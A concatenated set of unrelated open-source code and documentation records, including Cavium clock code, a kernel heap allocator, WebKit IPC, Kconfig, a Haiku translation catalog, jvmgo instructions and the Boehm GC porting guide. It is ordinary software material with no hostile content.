(support@cavium.com). All rights\n * reserved.\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions are\n * met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above\n * copyright notice, this list of conditions and the following\n * disclaimer in the documentation and/or other materials provided\n * with the distribution.\n\n * * Neither the name of Cavium Networks nor the names of\n * its contributors may be used to endorse or promote products\n * derived from this software without specific prior written\n * permission.\n\n * This Software, including technical data, may be subject to U.S. export control\n * laws, including the U.S. Export Administration Act and its associated\n * regulations, and may be subject to export or import regulations in other\n * countries.\n\n * TO THE MAXIMUM EXTENT PERMITTED BY LAW, THE SOFTWARE IS PROVIDED \"AS IS\"\n * AND WITH ALL FAULTS AND CAVIUM NETWORKS MAKES NO PROMISES, REPRESENTATIONS OR\n * WARRANTIES, EITHER EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE, WITH RESPECT TO\n * THE SOFTWARE, INCLUDING ITS CONDITION, ITS CONFORMITY TO ANY REPRESENTATION OR\n * DESCRIPTION, OR THE EXISTENCE OF ANY LATENT OR PATENT DEFECTS, AND CAVIUM\n * SPECIFICALLY DISCLAIMS ALL IMPLIED (IF ANY) WARRANTIES OF TITLE,\n * MERCHANTABILITY, NONINFRINGEMENT, FITNESS FOR A PARTICULAR PURPOSE, LACK OF\n * VIRUSES, ACCURACY OR COMPLETENESS, QUIET ENJOYMENT, QUIET POSSESSION OR\n * CORRESPONDENCE TO DESCRIPTION. THE ENTIRE RISK ARISING OUT OF USE OR\n * PERFORMANCE OF THE SOFTWARE LIES WITH YOU.\n ***********************license end**************************************/\n\n\n\n\n\n\n\n/**\n * @file\n *\n * Interface to Core, IO and DDR Clock.\n *\n *
$Revision: 45089 $
\n*/\n\n#ifdef CVMX_BUILD_FOR_LINUX_KERNEL\n#include \n#include \n#include \n#include \n#include \n#include \n#else\n#if !defined(__FreeBSD__) || !defined(_KERNEL)\n#include \"executive-config.h\"\n#endif\n#include \"cvmx.h\"\n#endif\n\n#ifndef CVMX_BUILD_FOR_UBOOT\nstatic uint64_t rate_eclk = 0;\nstatic uint64_t rate_sclk = 0;\nstatic uint64_t rate_dclk = 0;\n#endif\n\n/**\n * Get clock rate based on the clock type.\n *\n * @param clock - Enumeration of the clock type.\n * @return - return the clock rate.\n */\nuint64_t cvmx_clock_get_rate(cvmx_clock_t clock)\n{\n const uint64_t REF_CLOCK = 50000000;\n\n#ifdef CVMX_BUILD_FOR_UBOOT\n uint64_t rate_eclk = 0;\n uint64_t rate_sclk = 0;\n uint64_t rate_dclk = 0;\n#endif\n\n if (cvmx_unlikely(!rate_eclk))\n {\n if (octeon_has_feature(OCTEON_FEATURE_NPEI))\n {\n cvmx_npei_dbg_data_t npei_dbg_data;\n npei_dbg_data.u64 = cvmx_read_csr(CVMX_PEXP_NPEI_DBG_DATA);\n rate_eclk = REF_CLOCK * npei_dbg_data.s.c_mul;\n rate_sclk = rate_eclk;\n }\n else if (octeon_has_feature(OCTEON_FEATURE_PCIE))\n {\n cvmx_mio_rst_boot_t mio_rst_boot;\n mio_rst_boot.u64 = cvmx_read_csr(CVMX_MIO_RST_BOOT);\n rate_eclk = REF_CLOCK * mio_rst_boot.s.c_mul;\n rate_sclk = REF_CLOCK * mio_rst_boot.s.pnr_mul;\n }\n else\n {\n cvmx_dbg_data_t dbg_data;\n dbg_data.u64 = cvmx_read_csr(CVMX_DBG_DATA);\n rate_eclk = REF_CLOCK * dbg_data.s.c_mul;\n rate_sclk = rate_eclk;\n }\n }\n\n switch (clock)\n {\n case CVMX_CLOCK_SCLK:\n case CVMX_CLOCK_TIM:\n case CVMX_CLOCK_IPD:\n return rate_sclk;\n\n case CVMX_CLOCK_RCLK:\n case CVMX_CLOCK_CORE:\n return rate_eclk;\n\n case CVMX_CLOCK_DDR:\n#if !defined(CVMX_BUILD_FOR_LINUX_HOST) && !defined(__OCTEON_NEWLIB__)\n if (cvmx_unlikely(!rate_dclk))\n rate_dclk = cvmx_sysinfo_get()->dram_data_rate_hz;\n#endif\n return rate_dclk;\n }\n\n cvmx_dprintf(\"cvmx_clock_get_rate: Unknown clock type\\n\");\n return 0;\n}\n#ifdef CVMX_BUILD_FOR_LINUX_KERNEL\nEXPORT_SYMBOL(cvmx_clock_get_rate);\n#endif\n"} {"text": "/**\n * $Id$\n * Copyright (C) 2008 - 2014 Nils Asmussen\n *\n * This program is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License\n * as published by the Free Software Foundation; either version 2\n * of the License, or (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n */\n\n#include \n#include \n#include \n#include \n\nuintptr_t KHeap::allocAreas() {\n\tframeno_t frame = PhysMem::allocate(PhysMem::CRIT);\n\tif(frame == PhysMem::INVALID_FRAME)\n\t\treturn 0;\n\tpages++;\n\treturn DIR_MAP_AREA | (frame * PAGE_SIZE);\n}\n\nuintptr_t KHeap::allocSpace(size_t count) {\n\t/* if its just one page, take a frame from the pmem-stack */\n\tif(count == 1)\n\t\treturn allocAreas();\n\t/* otherwise we have to use contiguous physical memory */\n\tssize_t res = PhysMem::allocateContiguous(count,1);\n\tif(res < 0)\n\t\treturn 0;\n\tpages += count;\n\treturn DIR_MAP_AREA | (res * PAGE_SIZE);\n}\n"} {"text": "#ifndef _BITS_STRINGS_H\n#define _BITS_STRINGS_H\n\n/** @file\n *\n * String functions\n *\n */\n\nFILE_LICENCE ( GPL2_OR_LATER_OR_UBDL );\n\n/**\n * Find first (i.e. least significant) set bit\n *\n * @v value\t\tValue\n * @ret lsb\t\tLeast significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __ffsl ( long value ) {\n\tunsigned long bits = value;\n\tunsigned long lsb;\n\tunsigned int lz;\n\n\t/* Extract least significant set bit */\n\tlsb = ( bits & -bits );\n\n\t/* Count number of leading zeroes before LSB */\n\t__asm__ ( \"clz %0, %1\" : \"=r\" ( lz ) : \"r\" ( lsb ) );\n\n\treturn ( 32 - lz );\n}\n\n/**\n * Find first (i.e. least significant) set bit\n *\n * @v value\t\tValue\n * @ret lsb\t\tLeast significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __ffsll ( long long value ){\n\tunsigned long high = ( value >> 32 );\n\tunsigned long low = ( value >> 0 );\n\n\tif ( low ) {\n\t\treturn ( __ffsl ( low ) );\n\t} else if ( high ) {\n\t\treturn ( 32 + __ffsl ( high ) );\n\t} else {\n\t\treturn 0;\n\t}\n}\n\n/**\n * Find last (i.e. most significant) set bit\n *\n * @v value\t\tValue\n * @ret msb\t\tMost significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __flsl ( long value ) {\n\tunsigned int lz;\n\n\t/* Count number of leading zeroes */\n\t__asm__ ( \"clz %0, %1\" : \"=r\" ( lz ) : \"r\" ( value ) );\n\n\treturn ( 32 - lz );\n}\n\n/**\n * Find last (i.e. most significant) set bit\n *\n * @v value\t\tValue\n * @ret msb\t\tMost significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __flsll ( long long value ){\n\tunsigned long high = ( value >> 32 );\n\tunsigned long low = ( value >> 0 );\n\n\tif ( high ) {\n\t\treturn ( 32 + __flsl ( high ) );\n\t} else if ( low ) {\n\t\treturn ( __flsl ( low ) );\n\t} else {\n\t\treturn 0;\n\t}\n}\n\n#endif /* _BITS_STRINGS_H */\n"} {"text": "package graphqlbackend\n\nimport (\n\t\"context\"\n\n\t\"github.com/graph-gophers/graphql-go\"\n\t\"github.com/sourcegraph/sourcegraph/internal/conf\"\n\t\"github.com/sourcegraph/sourcegraph/schema\"\n)\n\ntype versionContextResolver struct {\n\tvc *schema.VersionContext\n}\n\nfunc (v *versionContextResolver) ID() graphql.ID {\n\treturn graphql.ID(v.vc.Name)\n}\n\nfunc (v *versionContextResolver) Name() string {\n\treturn v.vc.Name\n}\n\nfunc (v *versionContextResolver) Description() string {\n\treturn v.vc.Description\n}\n\nfunc NewVersionContextResolver(vc *schema.VersionContext) *versionContextResolver {\n\treturn &versionContextResolver{\n\t\tvc: vc,\n\t}\n}\n\nfunc (r *schemaResolver) VersionContexts(ctx context.Context) ([]*versionContextResolver, error) {\n\tvar versionContexts []*versionContextResolver\n\n\tfor _, vc := range conf.Get().ExperimentalFeatures.VersionContexts {\n\t\tversionContexts = append(versionContexts, NewVersionContextResolver(vc))\n\t}\n\n\treturn versionContexts, nil\n}\n"} {"text": "{\n \"jsonSchemaSemanticVersion\": \"1.0.0\",\n \"imports\": [\n {\n \"corpusPath\": \"cdm:/foundations.1.1.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Common.1.0.cdm.json\",\n \"moniker\": \"base_Common\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/DataEntityView.1.0.cdm.json\",\n \"moniker\": \"base_DataEntityView\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Budget/Group/BudgetModel.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Ledger/Group/LedgerPeriodCode.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Ledger/Group/LedgerRRGETemplates_W.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/FinancialDimensions/Group/DimensionHierarchy.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Ledger/Main/CompanyInfo.1.0.cdm.json\"\n }\n ],\n \"definitions\": [\n {\n \"entityName\": \"LedgerRRGReportTable_RU\",\n \"extendsEntity\": \"base_Common/Common\",\n \"exhibitsTraits\": [\n {\n \"traitReference\": \"is.CDM.entityVersion\",\n \"arguments\": [\n {\n \"name\": \"versionNumber\",\n \"value\": \"1.0\"\n }\n ]\n }\n ],\n \"hasAttributes\": [\n {\n \"name\": \"CurrencyForCalc\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"DataType\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"Description\",\n \"dataType\": \"Description\",\n \"description\": \"\"\n },\n {\n \"name\": \"LedgerPeriodCode\",\n \"dataType\": \"LedgerRRGEPeriodCode_W\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"LedgerRRGETemplates_W\",\n \"dataType\": \"LedgerRRGETemplateRecId_W\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"ModelNum\",\n \"dataType\": \"BudgetModelId\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"PointSignNum\",\n \"dataType\": \"LedgerRRGEPointSignNum_W\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"RepCode\",\n \"dataType\": \"LedgerRRGRepCode_RU\",\n \"description\": \"\"\n },\n {\n \"name\": \"ReportType\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"Scale\",\n \"dataType\": \"LedgerRRGEScale_W\",\n \"description\": \"\"\n },\n {\n \"name\": \"Template\",\n \"dataType\": \"FilenameOpen\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"TypeByCorrect\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"DimensionHierarchy\",\n \"dataType\": \"DimensionHierarchyId\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"DataAreaId\",\n \"dataType\": \"string\",\n \"isReadOnly\": true\n },\n {\n \"entity\": {\n \"entityReference\": \"BudgetModel\"\n },\n \"name\": \"Relationship_BudgetModelRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"LedgerPeriodCode\"\n },\n \"name\": \"Relationship_LedgerPeriodCodeRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"LedgerRRGETemplates_W\"\n },\n \"name\": \"Relationship_LedgerRRGETemplates_WRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"DimensionHierarchy\"\n },\n \"name\": \"Relationship_DimensionHierarchyRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"CompanyInfo\"\n },\n \"name\": \"Relationship_CompanyRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n }\n ],\n \"displayName\": \"Reports\"\n },\n {\n \"dataTypeName\": \"Description\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGEPeriodCode_W\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGETemplateRecId_W\",\n \"extendsDataType\": \"bigInteger\"\n },\n {\n \"dataTypeName\": \"BudgetModelId\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGEPointSignNum_W\",\n \"extendsDataType\": \"integer\"\n },\n {\n \"dataTypeName\": \"LedgerRRGRepCode_RU\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGEScale_W\",\n \"extendsDataType\": \"decimal\"\n },\n {\n \"dataTypeName\": \"FilenameOpen\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"DimensionHierarchyId\",\n \"extendsDataType\": \"bigInteger\"\n }\n ]\n}"} {"text": "/*\n * Copyright (C) 2011 Apple Inc. All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS\n * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF\n * THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#import \"config.h\"\n#import \"AttributedString.h\"\n\n#import \"ArgumentCodersMac.h\"\n#import \"ArgumentDecoder.h\"\n#import \"ArgumentEncoder.h\"\n\nnamespace WebKit {\n\nvoid AttributedString::encode(IPC::ArgumentEncoder& encoder) const\n{\n encoder << static_cast(!string);\n if (!string)\n return;\n IPC::encode(encoder, string.get());\n}\n\nbool AttributedString::decode(IPC::ArgumentDecoder& decoder, AttributedString& attributedString)\n{\n bool isNull;\n if (!decoder.decode(isNull))\n return false;\n if (isNull)\n return true;\n return IPC::decode(decoder, attributedString.string);\n}\n\n}\n"} {"text": "config SND_SOC_QCOM\n\ttristate \"ASoC support for QCOM platforms\"\n\tdepends on ARCH_QCOM || COMPILE_TEST\n\thelp\n Say Y or M if you want to add support to use audio devices\n in Qualcomm Technologies SOC-based platforms.\n\nconfig SND_SOC_LPASS_CPU\n\ttristate\n\tselect REGMAP_MMIO\n\nconfig SND_SOC_LPASS_PLATFORM\n\ttristate\n\tselect REGMAP_MMIO\n\nconfig SND_SOC_LPASS_IPQ806X\n\ttristate\n\tselect SND_SOC_LPASS_CPU\n\tselect SND_SOC_LPASS_PLATFORM\n\nconfig SND_SOC_LPASS_APQ8016\n\ttristate\n\tselect SND_SOC_LPASS_CPU\n\tselect SND_SOC_LPASS_PLATFORM\n\nconfig SND_SOC_STORM\n\ttristate \"ASoC I2S support for Storm boards\"\n\tdepends on SND_SOC_QCOM\n\tselect SND_SOC_LPASS_IPQ806X\n\tselect SND_SOC_MAX98357A\n\thelp\n Say Y or M if you want add support for SoC audio on the\n Qualcomm Technologies IPQ806X-based Storm board.\n\nconfig SND_SOC_APQ8016_SBC\n\ttristate \"SoC Audio support for APQ8016 SBC platforms\"\n\tdepends on SND_SOC_QCOM\n\tselect SND_SOC_LPASS_APQ8016\n\thelp\n Support for Qualcomm Technologies LPASS audio block in\n APQ8016 SOC-based systems.\n Say Y if you want to use audio devices on MI2S.\n"} {"text": "const compiler = require('@dcloudio/uni-mp-weixin/lib/uni.compiler.js')\r\nmodule.exports = Object.assign({}, compiler, {\r\n directive: 'ks:'\r\n})\r\n"} {"text": "1\tenglish\tx-vnd.haiku-screenshot\t3896204963\nInclude window border\tScreenshotWindow\t\t包含窗体边框\nOverwrite\tScreenshotWindow\t\t覆盖\nSave in:\tScreenshotWindow\t\t保存到:\nThis file already exists.\\n Are you sure you would like to overwrite it?\tScreenshotWindow\t\t文件已存在。\\n 是否进行文件替换?\nSelect\tScreenshotWindow\t\t选择\nSave as:\tScreenshotWindow\t\t保存为:\nseconds\tScreenshotWindow\t\t秒\nNew screenshot\tScreenshotWindow\t\t新建屏幕截图\nScreenshot\tSystem name\t\t屏幕截图\nDesktop\tScreenshotWindow\t\t桌面\nArtwork folder\tScreenshotWindow\t\t插图文件夹\nTranslator Settings\tScreenshotWindow\t\t转换器设置\nInclude mouse pointer\tScreenshotWindow\t\t包含鼠标指针\noverwrite\tScreenshotWindow\t\t覆盖\nSettings…\tScreenshotWindow\t\t设置...\nChoose folder\tScreenshotWindow\t\t选择文件夹\nName:\tScreenshotWindow\t\t名称:\nChoose folder…\tScreenshotWindow\t\t选择文件夹…\nPlease select\tScreenshotWindow\t\t请选择\nCancel\tScreenshotWindow\t\t取消\nDelay:\tScreenshotWindow\t\t延迟:\nCopy to clipboard\tScreenshotWindow\t\t复制到剪贴板\nscreenshot\tScreenshot\tBase filename of screenshot files\t屏幕截图\nHome folder\tScreenshotWindow\t\t主文件夹\nSave\tScreenshotWindow\t\t保存\nCapture active window\tScreenshotWindow\t\t捕捉活动窗口\n"} {"text": "1.5 (08 Jan 2003)\n"} {"text": "/*\nCopyright 2015 The Kubernetes Authors.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n*/\n\n// Package storage contains the plumbing to setup the etcd storage of the apiserver.\npackage storage // import \"k8s.io/apiserver/pkg/server/storage\"\n"} {"text": "// go-libtor - Self-contained Tor from Go\n// Copyright (c) 2018 Péter Szilágyi. All rights reserved.\n\npackage libtor\n\n/*\n#define DSO_NONE\n#define OPENSSLDIR \"/usr/local/ssl\"\n#define ENGINESDIR \"/usr/local/lib/engines\"\n\n#include <../crypto/des/cfb64ede.c>\n*/\nimport \"C\"\n"} {"text": "module.exports = require('./wrapperValue');\n"} {"text": "package stores\n\nimport \"jvmgo/ch11/instructions/base\"\nimport \"jvmgo/ch11/rtda\"\n\n// Store double into local variable\ntype DSTORE struct{ base.Index8Instruction }\n\nfunc (self *DSTORE) Execute(frame *rtda.Frame) {\n\t_dstore(frame, uint(self.Index))\n}\n\ntype DSTORE_0 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_0) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 0)\n}\n\ntype DSTORE_1 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_1) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 1)\n}\n\ntype DSTORE_2 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_2) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 2)\n}\n\ntype DSTORE_3 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_3) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 3)\n}\n\nfunc _dstore(frame *rtda.Frame, index uint) {\n\tval := frame.OperandStack().PopDouble()\n\tframe.LocalVars().SetDouble(index, val)\n}\n"} {"text": "\n\n Conservative GC Porting Directions\n\n\n

Conservative GC Porting Directions

\nThe collector is designed to be relatively easy to port, but is not\nportable code per se. The collector inherently has to perform operations,\nsuch as scanning the stack(s), that are not possible in portable C code.\n

\nAll of the following assumes that the collector is being ported to a\nbyte-addressable 32- or 64-bit machine. Currently all successful ports\nto 64-bit machines involve LP64 targets. The code base includes some\nprovisions for P64 targets (notably win64), but that has not been tested.\nYou are hereby discouraged from attempting a port to non-byte-addressable,\nor 8-bit, or 16-bit machines.\n

\nThe difficulty of porting the collector varies greatly depending on the needed\nfunctionality. In the simplest case, only some small additions are needed\nfor the include/private/gcconfig.h file. This is described in the\nfollowing section. Later sections discuss some of the optional features,\nwhich typically involve more porting effort.\n

\nNote that the collector makes heavy use of ifdefs. Unlike\nsome other software projects, we have concluded repeatedly that this is preferable\nto system dependent files, with code duplicated between the files.\nHowever, to keep this manageable, we do strongly believe in indenting\nifdefs correctly (for historical reasons usually without the leading\nsharp sign). (Separate source files are of course fine if they don't result in\ncode duplication.)\n

Adding Platforms to gcconfig.h

\nIf neither thread support, nor tracing of dynamic library data is required,\nthese are often the only changes you will need to make.\n

\nThe gcconfig.h file consists of three sections:\n

    \n
  1. A section that defines GC-internal macros\nthat identify the architecture (e.g. IA64 or I386)\nand operating system (e.g. LINUX or MSWIN32).\nThis is usually done by testing predefined macros. By defining\nour own macros instead of using the predefined ones directly, we can\nimpose a bit more consistency, and somewhat isolate ourselves from\ncompiler differences.\n

    \nIt is relatively straightforward to add a new entry here. But please try\nto be consistent with the existing code. In particular, 64-bit variants\nof 32-bit architectures general are not treated as a new architecture.\nInstead we explicitly test for 64-bit-ness in the few places in which it\nmatters. (The notable exception here is I386 and X86_64.\nThis is partially historical, and partially justified by the fact that there\nare arguably more substantial architecture and ABI differences here than\nfor RISC variants.)\n

    \non GNU-based systems, cpp -dM empty_source_file.c seems to generate\na set of predefined macros. On some other systems, the \"verbose\"\ncompiler option may do so, or the manual page may list them.\n

  2. \nA section that defines a small number of platform-specific macros, which are\nthen used directly by the collector. For simple ports, this is where most of\nthe effort is required. We describe the macros below.\n

    \nThis section contains a subsection for each architecture (enclosed in a\nsuitable ifdef. Each subsection usually contains some\narchitecture-dependent defines, followed by several sets of OS-dependent\ndefines, again enclosed in ifdefs.\n

  3. \nA section that fills in defaults for some macros left undefined in the preceding\nsection, and defines some other macros that rarely need adjustment for\nnew platforms. You will typically not have to touch these.\nIf you are porting to an OS that\nwas previously completely unsupported, it is likely that you will\nneed to add another clause to the definition of GET_MEM.\n
\nThe following macros must be defined correctly for each architecture and operating\nsystem:\n
\n
MACH_TYPE\n
\nDefined to a string that represents the machine architecture. Usually\njust the macro name used to identify the architecture, but enclosed in quotes.\n
OS_TYPE\n
\nDefined to a string that represents the operating system name. Usually\njust the macro name used to identify the operating system, but enclosed in quotes.\n
CPP_WORDSZ\n
\nThe word size in bits as a constant suitable for preprocessor tests,\ni.e. without casts or sizeof expressions. Currently always defined as\neither 64 or 32. For platforms supporting both 32- and 64-bit ABIs,\nthis should be conditionally defined depending on the current ABI.\nThere is a default of 32.\n
ALIGNMENT\n
\nDefined to be the largest N, such that\nall pointer are guaranteed to be aligned on N-byte boundaries.\ndefining it to be 1 will always work, but perform poorly.\nFor all modern 32-bit platforms, this is 4. For all modern 64-bit\nplatforms, this is 8. Whether or not X86 qualifies as a modern\narchitecture here is compiler- and OS-dependent.\n
DATASTART\n
\nThe beginning of the main data segment. The collector will trace all\nmemory between DATASTART and DATAEND for root pointers.\nOn some platforms,this can be defined to a constant address,\nthough experience has shown that to be risky. Ideally the linker will\ndefine a symbol (e.g. _data whose address is the beginning\nof the data segment. Sometimes the value can be computed using\nthe GC_SysVGetDataStart function. Not used if either\nthe next macro is defined, or if dynamic loading is supported, and the\ndynamic loading support defines a function\nGC_register_main_static_data() which returns false.\n
SEARCH_FOR_DATA_START\n
\nIf this is defined DATASTART will be defined to a dynamically\ncomputed value which is obtained by starting with the address of\n_end and walking backwards until non-addressable memory is found.\nThis often works on Posix-like platforms. It makes it harder to debug\nclient programs, since startup involves generating and catching a\nsegmentation fault, which tends to confuse users.\n
DATAEND\n
\nSet to the end of the main data segment. Defaults to end,\nwhere that is declared as an array. This works in some cases, since\nthe linker introduces a suitable symbol.\n
DATASTART2, DATAEND2\n
\nSome platforms have two discontiguous main data segments, e.g.\nfor initialized and uninitialized data. If so, these two macros\nshould be defined to the limits of the second main data segment.\n
STACK_GROWS_UP\n
\nShould be defined if the stack (or thread stacks) grow towards higher\naddresses. (This appears to be true only on PA-RISC. If your architecture\nhas more than one stack per thread, and is not already supported, you will\nneed to do more work. Grep for \"IA64\" in the source for an example.)\n
STACKBOTTOM\n
\nDefined to be the cool end of the stack, which is usually the\nhighest address in the stack. It must bound the region of the\nstack that contains pointers into the GC heap. With thread support,\nthis must be the cold end of the main stack, which typically\ncannot be found in the same way as the other thread stacks.\nIf this is not defined and none of the following three macros\nis defined, client code must explicitly set\nGC_stackbottom to an appropriate value before calling\nGC_INIT() or any other GC_ routine.\n
LINUX_STACKBOTTOM\n
\nMay be defined instead of STACKBOTTOM.\nIf defined, then the cold end of the stack will be determined\nCurrently we usually read it from /proc.\n
HEURISTIC1\n
\nMay be defined instead of STACKBOTTOM.\nSTACK_GRAN should generally also be undefined and defined.\nThe cold end of the stack is determined by taking an address inside\nGC_init's frame, and rounding it up to\nthe next multiple of STACK_GRAN. This works well if the stack base is\nalways aligned to a large power of two.\n(STACK_GRAN is predefined to 0x1000000, which is\nrarely optimal.)\n
HEURISTIC2\n
\nMay be defined instead of STACKBOTTOM.\nThe cold end of the stack is determined by taking an address inside\nGC_init's frame, incrementing it repeatedly\nin small steps (decrement if STACK_GROWS_UP), and reading the value\nat each location. We remember the value when the first\nSegmentation violation or Bus error is signalled, round that\nto the nearest plausible page boundary, and use that as the\nstack base.\n
DYNAMIC_LOADING\n
\nShould be defined if dyn_load.c has been updated for this\nplatform and tracing of dynamic library roots is supported.\n
MPROTECT_VDB, PROC_VDB\n
\nMay be defined if the corresponding \"virtual dirty bit\"\nimplementation in os_dep.c is usable on this platform. This\nallows incremental/generational garbage collection.\nMPROTECT_VDB identifies modified pages by\nwrite protecting the heap and catching faults.\nPROC_VDB uses the /proc primitives to read dirty bits.\n
PREFETCH, PREFETCH_FOR_WRITE\n
\nThe collector uses PREFETCH(x) to preload the cache\nwith *x.\nThis defaults to a no-op.\n
CLEAR_DOUBLE\n
\nIf CLEAR_DOUBLE is defined, then\nCLEAR_DOUBLE(x) is used as a fast way to\nclear the two words at GC_malloc-aligned address x. By default,\nword stores of 0 are used instead.\n
HEAP_START\n
\nHEAP_START may be defined as the initial address hint for mmap-based\nallocation.\n
ALIGN_DOUBLE\n
\nShould be defined if the architecture requires double-word alignment\nof GC_malloced memory, e.g. 8-byte alignment with a\n32-bit ABI. Most modern machines are likely to require this.\nThis is no longer needed for GC7 and later.\n
\n

Additional requirements for a basic port

\nIn some cases, you may have to add additional platform-specific code\nto other files. A likely candidate is the implementation of\nGC_with_callee_saves_pushed in mach_dep.c.\nThis ensure that register contents that the collector must trace\nfrom are copied to the stack. Typically this can be done portably,\nbut on some platforms it may require assembly code, or just\ntweaking of conditional compilation tests.\n

\nFor GC7, if your platform supports getcontext(), then definining\nthe macro UNIX_LIKE for your OS in gcconfig.h\n(if it isn't defined there already) is likely to solve the problem.\notherwise, if you are using gcc, _builtin_unwind_init()\nwill be used, and should work fine. If that is not applicable either,\nthe implementation will try to use setjmp(). This will work if your\nsetjmp implementation saves all possibly pointer-valued registers\ninto the buffer, as opposed to trying to unwind the stack at\nlongjmp time. The setjmp_test test tries to determine this,\nbut often doesn't get it right.\n

\nIn GC6.x versions of the collector, tracing of registers\nwas more commonly handled\nwith assembly code. In GC7, this is generally to be avoided.\n

\nMost commonly os_dep.c will not require attention, but see below.\n

Thread support

\nSupporting threads requires that the collector be able to find and suspend\nall threads potentially accessing the garbage-collected heap, and locate\nany state associated with each thread that must be traced.\n

\nThe functionality needed for thread support is generally implemented\nin one or more files specific to the particular thread interface.\nFor example, somewhat portable pthread support is implemented\nin pthread_support.c and pthread_stop_world.c.\nThe essential functionality consists of\n

\n
GC_stop_world()\n
\nStops all threads which may access the garbage collected heap, other\nthan the caller.\n
GC_start_world()\n
\nRestart other threads.\n
